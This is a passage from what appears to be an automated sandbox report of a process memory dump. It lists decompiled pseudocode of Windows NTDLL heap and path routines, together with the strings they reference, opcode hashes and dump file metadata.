                        					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                        						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                        						asm("int3");
                        						 *(_t41 - 4) = 0xfffffffe;
                        					}
                        				}
                        				 *(_t41 - 4) = 1;
                        				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                        				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                        				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                        				 *((intOrPtr*)(_t41 - 0x64)) = L02BEDEF0;
                        				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                        				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                        				_push(_t41 - 0x70);
                        				L02BEDEF0(1, _t38);
                        				 *(_t41 - 4) = 0xfffffffe;
                        				return E02BED130(_t34, _t39, _t40);
                        			}






                        Strings
                        • Critical error detected %lx, xrefs: 02C48E21
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: Critical error detected %lx
                        • API String ID: 0-802127002
                        • Opcode ID: 395c61300d71ccbc2d46d1e92574734876a15ac6e1c297564e684faab7c1cc5d
                        • Instruction ID: 591baf2f1247076efce493a4be6354227a3d834a23f24adf176fda5cadff3fc7
                        • Opcode Fuzzy Hash: 395c61300d71ccbc2d46d1e92574734876a15ac6e1c297564e684faab7c1cc5d
                        • Instruction Fuzzy Hash: 7911AD75D10388EBDF24DFA489057EEBBB5BB04714F20429ED42AAB292C7744601CF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 02C2FF60
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                        • API String ID: 0-1911121157
                        • Opcode ID: 91bedc402c757fa23b3e44571f81ac785afe0e78ca36faeab6df31ec8fc47dab
                        • Instruction ID: 0d80b6df0a976a8ddd43729ac9f242c8fd413b4b73b273f106c6fd1fc4204345
                        • Opcode Fuzzy Hash: 91bedc402c757fa23b3e44571f81ac785afe0e78ca36faeab6df31ec8fc47dab
                        • Instruction Fuzzy Hash: B7110471950158EFEF11EB50CD48F98B7F2FF48708F148098F5099B561CB799A44CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E02C65BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed int _t296;
                        				signed char _t298;
                        				signed int _t301;
                        				signed int _t306;
                        				signed int _t310;
                        				signed char _t311;
                        				intOrPtr _t312;
                        				signed int _t313;
                        				void* _t327;
                        				signed int _t328;
                        				intOrPtr _t329;
                        				intOrPtr _t333;
                        				signed char _t334;
                        				signed int _t336;
                        				void* _t339;
                        				signed int _t340;
                        				signed int _t356;
                        				signed int _t362;
                        				short _t367;
                        				short _t368;
                        				short _t373;
                        				signed int _t380;
                        				void* _t382;
                        				short _t385;
                        				signed short _t392;
                        				signed char _t393;
                        				signed int _t395;
                        				signed char _t397;
                        				signed int _t398;
                        				signed short _t402;
                        				void* _t406;
                        				signed int _t412;
                        				signed char _t414;
                        				signed short _t416;
                        				signed int _t421;
                        				signed char _t427;
                        				intOrPtr _t434;
                        				signed char _t435;
                        				signed int _t436;
                        				signed int _t442;
                        				signed int _t446;
                        				signed int _t447;
                        				signed int _t451;
                        				signed int _t453;
                        				signed int _t454;
                        				signed int _t455;
                        				intOrPtr _t456;
                        				intOrPtr* _t457;
                        				short _t458;
                        				signed short _t462;
                        				signed int _t469;
                        				intOrPtr* _t474;
                        				signed int _t475;
                        				signed int _t479;
                        				signed int _t480;
                        				signed int _t481;
                        				short _t485;
                        				signed int _t491;
                        				signed int* _t494;
                        				signed int _t498;
                        				signed int _t505;
                        				intOrPtr _t506;
                        				signed short _t508;
                        				signed int _t511;
                        				void* _t517;
                        				signed int _t519;
                        				signed int _t522;
                        				void* _t523;
                        				signed int _t524;
                        				void* _t528;
                        				signed int _t529;
                        
                        				_push(0xd4);
                        				_push(0x2c71178);
                        				E02BED0E8(__ebx, __edi, __esi);
                        				_t494 = __edx;
                        				 *(_t528 - 0xcc) = __edx;
                        				_t511 = __ecx;
                        				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                        				 *(_t528 - 0xbc) = __ecx;
                        				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                        				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                        				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                        				_t427 = 0;
                        				 *(_t528 - 0x74) = 0;
                        				 *(_t528 - 0x9c) = 0;
                        				 *(_t528 - 0x84) = 0;
                        				 *(_t528 - 0xac) = 0;
                        				 *(_t528 - 0x88) = 0;
                        				 *(_t528 - 0xa8) = 0;
                        				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                        				if( *(_t528 + 0x1c) <= 0x80) {
                        					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                        					if(__eflags != 0) {
                        						_t421 = E02C64C56(0, __edx, __ecx, __eflags);
                        						__eflags = _t421;
                        						if(_t421 != 0) {
                        							 *((intOrPtr*)(_t528 - 4)) = 0;
                        							E02BDD000(0x410);
                        							 *(_t528 - 0x18) = _t529;
                        							 *(_t528 - 0x9c) = _t529;
                        							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                        							E02C65542(_t528 - 0x9c, _t528 - 0x84);
                        						}
                        					}
                        					_t435 = _t427;
                        					 *(_t528 - 0xd0) = _t435;
                        					_t474 = _t511 + 0x65;
                        					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                        					_t511 = 0x18;
                        					while(1) {
                        						 *(_t528 - 0xa0) = _t427;
                        						 *(_t528 - 0xbc) = _t427;
                        						 *(_t528 - 0x80) = _t427;
                        						 *(_t528 - 0x78) = 0x50;
                        						 *(_t528 - 0x79) = _t427;
                        						 *(_t528 - 0x7a) = _t427;
                        						 *(_t528 - 0x8c) = _t427;
                        						 *(_t528 - 0x98) = _t427;
                        						 *(_t528 - 0x90) = _t427;
                        						 *(_t528 - 0xb0) = _t427;
                        						 *(_t528 - 0xb8) = _t427;
                        						_t296 = 1 << _t435;
                        						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                        						__eflags = _t436 & _t296;
                        						if((_t436 & _t296) != 0) {
                        							goto L92;
                        						}
                        						__eflags =  *((char*)(_t474 - 1));
                        						if( *((char*)(_t474 - 1)) == 0) {
                        							goto L92;
                        						}
                        						_t301 =  *_t474;
                        						__eflags = _t494[1] - _t301;
                        						if(_t494[1] <= _t301) {
                        							L10:
                        							__eflags =  *(_t474 - 5) & 0x00000040;
                        							if(( *(_t474 - 5) & 0x00000040) == 0) {
                        								L12:
                        								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                        								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                        									goto L92;
                        								}
                        								_t442 =  *(_t474 - 0x11) & _t494[3];
                        								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                        								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                        									goto L92;
                        								}
                        								__eflags = _t442 -  *(_t474 - 0x11);
                        								if(_t442 !=  *(_t474 - 0x11)) {
                        									goto L92;
                        								}
                        								L15:
                        								_t306 =  *(_t474 + 1) & 0x000000ff;
                        								 *(_t528 - 0xc0) = _t306;
                        								 *(_t528 - 0xa4) = _t306;
                        								__eflags =  *0x2c860e8;
                        								if( *0x2c860e8 != 0) {
                        									__eflags = _t306 - 0x40;
                        									if(_t306 < 0x40) {
                        										L20:
                        										asm("lock inc dword [eax]");
                        										_t310 =  *0x2c860e8; // 0x0
                        										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                        										__eflags = _t311 & 0x00000001;
                        										if((_t311 & 0x00000001) == 0) {
                        											 *(_t528 - 0xa0) = _t311;
                        											_t475 = _t427;
                        											 *(_t528 - 0x74) = _t427;
                        											__eflags = _t475;
                        											if(_t475 != 0) {
                        												L91:
                        												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                        												goto L92;
                        											}
                        											asm("sbb edi, edi");
                        											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                        											_t511 = _t498;
                        											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                        											__eflags =  *(_t312 - 5) & 1;
                        											if(( *(_t312 - 5) & 1) != 0) {
                        												_push(_t528 - 0x98);
                        												_push(0x4c);
                        												_push(_t528 - 0x70);
                        												_push(1);
                        												_push(0xfffffffa);
                        												_t412 = E02BD9710();
                        												_t475 = _t427;
                        												__eflags = _t412;
                        												if(_t412 >= 0) {
                        													_t414 =  *(_t528 - 0x98) - 8;
                        													 *(_t528 - 0x98) = _t414;
                        													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                        													 *(_t528 - 0x8c) = _t416;
                        													 *(_t528 - 0x79) = 1;
                        													_t511 = (_t416 & 0x0000ffff) + _t498;
                        													__eflags = _t511;
                        												}
                        											}
                        											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                        											__eflags = _t446 & 0x00000004;
                        											if((_t446 & 0x00000004) != 0) {
                        												__eflags =  *(_t528 - 0x9c);
                        												if( *(_t528 - 0x9c) != 0) {
                        													 *(_t528 - 0x7a) = 1;
                        													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                        													__eflags = _t511;
                        												}
                        											}
                        											_t313 = 2;
                        											_t447 = _t446 & _t313;
                        											__eflags = _t447;
                        											 *(_t528 - 0xd4) = _t447;
                        											if(_t447 != 0) {
                        												_t406 = 0x10;
                        												_t511 = _t511 + _t406;
                        												__eflags = _t511;
                        											}
                        											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                        											 *(_t528 - 0x88) = _t427;
                        											__eflags =  *(_t528 + 0x1c);
                        											if( *(_t528 + 0x1c) <= 0) {
                        												L45:
                        												__eflags =  *(_t528 - 0xb0);
                        												if( *(_t528 - 0xb0) != 0) {
                        													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                        													__eflags = _t511;
                        												}
                        												__eflags = _t475;
                        												if(_t475 != 0) {
                        													asm("lock dec dword [ecx+edx*8+0x4]");
                        													goto L100;
                        												} else {
                        													_t494[3] = _t511;
                        													_t451 =  *(_t528 - 0xa0);
                        													_t427 = E02BD6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                        													 *(_t528 - 0x88) = _t427;
                        													__eflags = _t427;
                        													if(_t427 == 0) {
                        														__eflags = _t511 - 0xfff8;
                        														if(_t511 <= 0xfff8) {
                        															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                        															asm("sbb ecx, ecx");
                        															__eflags = (_t451 & 0x000000e2) + 8;
                        														}
                        														asm("lock dec dword [eax+edx*8+0x4]");
                        														L100:
                        														goto L101;
                        													}
                        													_t453 =  *(_t528 - 0xa0);
                        													 *_t494 = _t453;
                        													_t494[1] = _t427;
                        													_t494[2] =  *(_t528 - 0xbc);
                        													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                        													 *_t427 =  *(_t453 + 0x24) | _t511;
                        													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                        													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													__eflags =  *(_t528 + 0x14);
                        													if( *(_t528 + 0x14) == 0) {
                        														__eflags =  *[fs:0x18] + 0xf50;
                        													}
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													__eflags =  *(_t528 + 0x18);
                        													if( *(_t528 + 0x18) == 0) {
                        														_t454 =  *(_t528 - 0x80);
                        														_t479 =  *(_t528 - 0x78);
                        														_t327 = 1;
                        														__eflags = 1;
                        													} else {
                        														_t146 = _t427 + 0x50; // 0x50
                        														_t454 = _t146;
                        														 *(_t528 - 0x80) = _t454;
                        														_t382 = 0x18;
                        														 *_t454 = _t382;
                        														 *((short*)(_t454 + 2)) = 1;
                        														_t385 = 0x10;
                        														 *((short*)(_t454 + 6)) = _t385;
                        														 *(_t454 + 4) = 0;
                        														asm("movsd");
                        														asm("movsd");
                        														asm("movsd");
                        														asm("movsd");
                        														_t327 = 1;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 = 0x68;
                        														 *(_t528 - 0x78) = _t479;
                        													}
                        													__eflags =  *(_t528 - 0x79) - _t327;
                        													if( *(_t528 - 0x79) == _t327) {
                        														_t524 = _t479 + _t427;
                        														_t508 =  *(_t528 - 0x8c);
                        														 *_t524 = _t508;
                        														_t373 = 2;
                        														 *((short*)(_t524 + 2)) = _t373;
                        														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                        														 *((short*)(_t524 + 4)) = 0;
                        														_t167 = _t524 + 8; // 0x8
                        														E02BDF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                        														_t529 = _t529 + 0xc;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                        														 *(_t528 - 0x78) = _t479;
                        														_t380 =  *(_t528 - 0x80);
                        														__eflags = _t380;
                        														if(_t380 != 0) {
                        															_t173 = _t380 + 4;
                        															 *_t173 =  *(_t380 + 4) | 1;
                        															__eflags =  *_t173;
                        														}
                        														_t454 = _t524;
                        														 *(_t528 - 0x80) = _t454;
                        														_t327 = 1;
                        														__eflags = 1;
                        													}
                        													__eflags =  *(_t528 - 0xd4);
                        													if( *(_t528 - 0xd4) == 0) {
                        														_t505 =  *(_t528 - 0x80);
                        													} else {
                        														_t505 = _t479 + _t427;
                        														_t523 = 0x10;
                        														 *_t505 = _t523;
                        														_t367 = 3;
                        														 *((short*)(_t505 + 2)) = _t367;
                        														_t368 = 4;
                        														 *((short*)(_t505 + 6)) = _t368;
                        														 *(_t505 + 4) = 0;
                        														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                        														_t327 = 1;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 = _t479 + _t523;
                        														 *(_t528 - 0x78) = _t479;
                        														__eflags = _t454;
                        														if(_t454 != 0) {
                        															_t186 = _t454 + 4;
                        															 *_t186 =  *(_t454 + 4) | 1;
                        															__eflags =  *_t186;
                        														}
                        														 *(_t528 - 0x80) = _t505;
                        													}
                        													__eflags =  *(_t528 - 0x7a) - _t327;
                        													if( *(_t528 - 0x7a) == _t327) {
                        														 *(_t528 - 0xd4) = _t479 + _t427;
                        														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                        														E02BDF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                        														_t529 = _t529 + 0xc;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 =  *(_t528 - 0x78) + _t522;
                        														 *(_t528 - 0x78) = _t479;
                        														__eflags = _t505;
                        														if(_t505 != 0) {
                        															_t199 = _t505 + 4;
                        															 *_t199 =  *(_t505 + 4) | 1;
                        															__eflags =  *_t199;
                        														}
                        														_t505 =  *(_t528 - 0xd4);
                        														 *(_t528 - 0x80) = _t505;
                        													}
                        													__eflags =  *(_t528 - 0xa8);
                        													if( *(_t528 - 0xa8) != 0) {
                        														_t356 = _t479 + _t427;
                        														 *(_t528 - 0xd4) = _t356;
                        														_t462 =  *(_t528 - 0xac);
                        														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                        														_t485 = 0xc;
                        														 *((short*)(_t356 + 2)) = _t485;
                        														 *(_t356 + 6) = _t462;
                        														 *((short*)(_t356 + 4)) = 0;
                        														_t211 = _t356 + 8; // 0x9
                        														E02BDF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                        														E02BDFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                        														_t529 = _t529 + 0x18;
                        														_t427 =  *(_t528 - 0x88);
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t505 =  *(_t528 - 0xd4);
                        														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                        														 *(_t528 - 0x78) = _t479;
                        														_t362 =  *(_t528 - 0x80);
                        														__eflags = _t362;
                        														if(_t362 != 0) {
                        															_t222 = _t362 + 4;
                        															 *_t222 =  *(_t362 + 4) | 1;
                        															__eflags =  *_t222;
                        														}
                        													}
                        													__eflags =  *(_t528 - 0xb0);
                        													if( *(_t528 - 0xb0) != 0) {
                        														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                        														_t458 = 0xb;
                        														 *((short*)(_t479 + _t427 + 2)) = _t458;
                        														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                        														 *((short*)(_t427 + 4 + _t479)) = 0;
                        														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                        														E02BDFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                        														_t529 = _t529 + 0xc;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                        														 *(_t528 - 0x78) = _t479;
                        														__eflags = _t505;
                        														if(_t505 != 0) {
                        															_t241 = _t505 + 4;
                        															 *_t241 =  *(_t505 + 4) | 1;
                        															__eflags =  *_t241;
                        														}
                        													}
                        													_t328 =  *(_t528 + 0x1c);
                        													__eflags = _t328;
                        													if(_t328 == 0) {
                        														L87:
                        														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                        														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                        														_t455 =  *(_t528 - 0xdc);
                        														 *(_t427 + 0x14) = _t455;
                        														_t480 =  *(_t528 - 0xa0);
                        														_t517 = 3;
                        														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                        														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                        															asm("rdtsc");
                        															 *(_t427 + 0x3c) = _t480;
                        														} else {
                        															 *(_t427 + 0x3c) = _t455;
                        														}
                        														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                        														_t456 =  *[fs:0x18];
                        														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                        														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                        														_t427 = 0;
                        														__eflags = 0;
                        														_t511 = 0x18;
                        														goto L91;
                        													} else {
                        														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                        														__eflags = _t519;
                        														 *(_t528 - 0x8c) = _t328;
                        														do {
                        															_t506 =  *((intOrPtr*)(_t519 - 4));
                        															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                        															 *(_t528 - 0xd4) =  *(_t519 - 8);
                        															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                        															__eflags =  *(_t333 + 0x36) & 0x00004000;
                        															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                        																_t334 =  *_t519;
                        															} else {
                        																_t334 = 0;
                        															}
                        															_t336 = _t334 & 0x000000ff;
                        															__eflags = _t336;
                        															_t427 =  *(_t528 - 0x88);
                        															if(_t336 == 0) {
                        																_t481 = _t479 + _t506;
                        																__eflags = _t481;
                        																 *(_t528 - 0x78) = _t481;
                        																E02BDF3E0(_t479 + _t427, _t457, _t506);
                        																_t529 = _t529 + 0xc;
                        															} else {
                        																_t340 = _t336 - 1;
                        																__eflags = _t340;
                        																if(_t340 == 0) {
                        																	E02BDF3E0( *(_t528 - 0xb8), _t457, _t506);
                        																	_t529 = _t529 + 0xc;
                        																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                        																} else {
                        																	__eflags = _t340 == 0;
                        																	if(_t340 == 0) {
                        																		__eflags = _t506 - 8;
                        																		if(_t506 == 8) {
                        																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                        																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                        																		}
                        																	}
                        																}
                        															}
                        															_t339 = 0x10;
                        															_t519 = _t519 + _t339;
                        															_t263 = _t528 - 0x8c;
                        															 *_t263 =  *(_t528 - 0x8c) - 1;
                        															__eflags =  *_t263;
                        															_t479 =  *(_t528 - 0x78);
                        														} while ( *_t263 != 0);
                        														goto L87;
                        													}
                        												}
                        											} else {
                        												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                        												 *(_t528 - 0xa2) = _t392;
                        												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                        												__eflags = _t469;
                        												while(1) {
                        													 *(_t528 - 0xe4) = _t511;
                        													__eflags = _t392;
                        													_t393 = _t427;
                        													if(_t392 != 0) {
                        														_t393 =  *((intOrPtr*)(_t469 + 4));
                        													}
                        													_t395 = (_t393 & 0x000000ff) - _t427;
                        													__eflags = _t395;
                        													if(_t395 == 0) {
                        														_t511 = _t511 +  *_t469;
                        														__eflags = _t511;
                        													} else {
                        														_t398 = _t395 - 1;
                        														__eflags = _t398;
                        														if(_t398 == 0) {
                        															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                        															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                        														} else {
                        															__eflags = _t398 == 1;
                        															if(_t398 == 1) {
                        																 *(_t528 - 0xa8) =  *(_t469 - 8);
                        																_t402 =  *_t469 & 0x0000ffff;
                        																 *(_t528 - 0xac) = _t402;
                        																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                        															}
                        														}
                        													}
                        													__eflags = _t511 -  *(_t528 - 0xe4);
                        													if(_t511 <  *(_t528 - 0xe4)) {
                        														break;
                        													}
                        													_t397 =  *(_t528 - 0x88) + 1;
                        													 *(_t528 - 0x88) = _t397;
                        													_t469 = _t469 + 0x10;
                        													__eflags = _t397 -  *(_t528 + 0x1c);
                        													_t392 =  *(_t528 - 0xa2);
                        													if(_t397 <  *(_t528 + 0x1c)) {
                        														continue;
                        													}
                        													goto L45;
                        												}
                        												_t475 = 0x216;
                        												 *(_t528 - 0x74) = 0x216;
                        												goto L45;
                        											}
                        										} else {
                        											asm("lock dec dword [eax+ecx*8+0x4]");
                        											goto L16;
                        										}
                        									}
                        									_t491 = E02C64CAB(_t306, _t528 - 0xa4);
                        									 *(_t528 - 0x74) = _t491;
                        									__eflags = _t491;
                        									if(_t491 != 0) {
                        										goto L91;
                        									} else {
                        										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                        										goto L20;
                        									}
                        								}
                        								L16:
                        								 *(_t528 - 0x74) = 0x1069;
                        								L93:
                        								_t298 =  *(_t528 - 0xd0) + 1;
                        								 *(_t528 - 0xd0) = _t298;
                        								_t474 = _t474 + _t511;
                        								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                        								_t494 = 4;
                        								__eflags = _t298 - _t494;
                        								if(_t298 >= _t494) {
                        									goto L100;
                        								}
                        								_t494 =  *(_t528 - 0xcc);
                        								_t435 = _t298;
                        								continue;
                        							}
                        							__eflags = _t494[2] | _t494[3];
                        							if((_t494[2] | _t494[3]) == 0) {
                        								goto L15;
                        							}
                        							goto L12;
                        						}
                        						__eflags = _t301;
                        						if(_t301 != 0) {
                        							goto L92;
                        						}
                        						goto L10;
                        						L92:
                        						goto L93;
                        					}
                        				} else {
                        					_push(0x57);
                        					L101:
                        					return E02BED130(_t427, _t494, _t511);
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5d01980471385018dca78b388b5d594679d8aaa78806e6e1ddcec3c2ebb228c0
                        • Instruction ID: 8d6df26f56b44f0141859569a8c5cc4221da4f8e8bf96dd8403dc9f69d22195f
                        • Opcode Fuzzy Hash: 5d01980471385018dca78b388b5d594679d8aaa78806e6e1ddcec3c2ebb228c0
                        • Instruction Fuzzy Hash: 56426C71D00229CFDB24CF68C884BA9B7B5FF89304F2481AAD85DEB242D7359A85CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E02BB4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                        				signed int _v8;
                        				void* _v20;
                        				signed int _v24;
                        				char _v532;
                        				char _v540;
                        				signed short _v544;
                        				signed int _v548;
                        				signed short* _v552;
                        				signed short _v556;
                        				signed short* _v560;
                        				signed short* _v564;
                        				signed short* _v568;
                        				void* _v570;
                        				signed short* _v572;
                        				signed short _v576;
                        				signed int _v580;
                        				char _v581;
                        				void* _v584;
                        				unsigned int _v588;
                        				signed short* _v592;
                        				void* _v597;
                        				void* _v600;
                        				void* _v604;
                        				void* _v609;
                        				void* _v616;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				unsigned int _t161;
                        				signed int _t162;
                        				unsigned int _t163;
                        				void* _t169;
                        				signed short _t173;
                        				signed short _t177;
                        				signed short _t181;
                        				unsigned int _t182;
                        				signed int _t185;
                        				signed int _t213;
                        				signed int _t225;
                        				short _t233;
                        				signed char _t234;
                        				signed int _t242;
                        				signed int _t243;
                        				signed int _t244;
                        				signed int _t245;
                        				signed int _t250;
                        				void* _t251;
                        				signed short* _t254;
                        				void* _t255;
                        				signed int _t256;
                        				void* _t257;
                        				signed short* _t260;
                        				signed short _t265;
                        				signed short* _t269;
                        				signed short _t271;
                        				signed short** _t272;
                        				signed short* _t275;
                        				signed short _t282;
                        				signed short _t283;
                        				signed short _t290;
                        				signed short _t299;
                        				signed short _t307;
                        				signed int _t308;
                        				signed short _t311;
                        				signed short* _t315;
                        				signed short _t316;
                        				void* _t317;
                        				void* _t319;
                        				signed short* _t321;
                        				void* _t322;
                        				void* _t323;
                        				unsigned int _t324;
                        				signed int _t325;
                        				void* _t326;
                        				signed int _t327;
                        				signed int _t329;
                        
                        				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                        				_v8 =  *0x2c8d360 ^ _t329;
                        				_t157 = _a8;
                        				_t321 = _a4;
                        				_t315 = __edx;
                        				_v548 = __ecx;
                        				_t305 = _a20;
                        				_v560 = _a12;
                        				_t260 = _a16;
                        				_v564 = __edx;
                        				_v580 = _a8;
                        				_v572 = _t260;
                        				_v544 = _a20;
                        				if( *__edx <= 8) {
                        					L3:
                        					if(_t260 != 0) {
                        						 *_t260 = 0;
                        					}
                        					_t254 =  &_v532;
                        					_v588 = 0x208;
                        					if((_v548 & 0x00000001) != 0) {
                        						_v556 =  *_t315;
                        						_v552 = _t315[2];
                        						_t161 = E02BCF232( &_v556);
                        						_t316 = _v556;
                        						_v540 = _t161;
                        						goto L17;
                        					} else {
                        						_t306 = 0x208;
                        						_t298 = _t315;
                        						_t316 = E02BB6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                        						if(_t316 == 0) {
                        							L68:
                        							_t322 = 0xc0000033;
                        							goto L39;
                        						} else {
                        							while(_v581 == 0) {
                        								_t233 = _v588;
                        								if(_t316 > _t233) {
                        									_t234 = _v548;
                        									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                        										_t254 = L02BB4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                        										if(_t254 == 0) {
                        											_t169 = 0xc0000017;
                        										} else {
                        											_t298 = _v564;
                        											_v588 = _t316;
                        											_t306 = _t316;
                        											_t316 = E02BB6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                        											if(_t316 != 0) {
                        												continue;
                        											} else {
                        												goto L68;
                        											}
                        										}
                        									} else {
                        										goto L90;
                        									}
                        								} else {
                        									_v556 = _t316;
                        									 *((short*)(_t329 + 0x32)) = _t233;
                        									_v552 = _t254;
                        									if(_t316 < 2) {
                        										L11:
                        										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                        											_t161 = 5;
                        										} else {
                        											if(_t316 < 6) {
                        												L87:
